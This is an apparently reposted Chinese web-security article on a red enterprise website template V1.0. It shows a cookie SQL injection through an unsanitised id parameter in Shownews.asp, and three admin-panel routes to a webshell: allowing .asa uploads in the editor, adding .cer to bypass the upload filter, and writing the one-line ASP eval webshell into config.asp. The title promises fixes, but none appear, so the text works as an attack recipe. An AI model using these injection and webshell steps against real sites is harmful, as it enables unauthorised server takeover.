好得很程序员自学网

<tfoot draggable='sEl'></tfoot>

红色大方的企业网站V1.0漏洞及修复 - 网站安全

Author:mer4en7y 遇到了,蛋疼 Check_sql.asp: '----- 对 get query 值 的过滤. '-----对 post 表 单值的过滤. 对get、post方式进行了过滤

Shownews.asp: <% id=cstr(request("id")) Set rsnews=Server.CreateObject("ADODB.RecordSet") sql="update news set hits=hits+1 where id="&id conn.execute sql sql="select * from news where id="&owen rsnews.Open sql,conn,1,1 title=rsnews("title") if rsnews.eof and rsnews.bof then response.Write("数据库出错") else %> Id参数导致Cookie注入

后台拿shell(南方数据的一些方法): 1)编辑器拿shell: 访问 http://www.2cto.com /SouthidcEditor/admin_style.asp 添加asa,上传 2)upfile_photo.asp <!--#include file="Inc/config.asp"--> …. if fileEXT="asp" or fileEXT="asa" or fileEXT="aspx" then                         EnableUpload=false                 end if                 if EnableUpload=false then                         msg="这种文件类型不允许上传!\n\n只允许上传这几种文件类型:" & UpFileType                         FoundErr=true                 end if ….. 其中:Config.asp: Const SaveUpFilesPath="UploadFiles"        '存放上传文件的目录 Const UpFileType="gif|jpg|bmp|png|swf|doc|rar"        '允许的上传文件类型 Const DelUpFiles="Yes"        '删除文章时是否同时删除文章中的上传文件 我们可以在网站配置的地方增加cer等,完全可以绕过。 3)网站配置插入一句话 "%><%Eval(Request([cmd]))%><% 一句话地址: http://www.2cto.com /inc/config. asp

查看更多关于红色大方的企业网站V1.0漏洞及修复 - 网站安全的详细内容...

声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://www.haodehen.cn/did11395
  阅读:33次

上一篇: 利用“PHP彩蛋”进行敏感信息获取 - 网站安全

下一篇:PHPCMS2008后台拿shell及修复 - 网站安全 - 自学php

相关资讯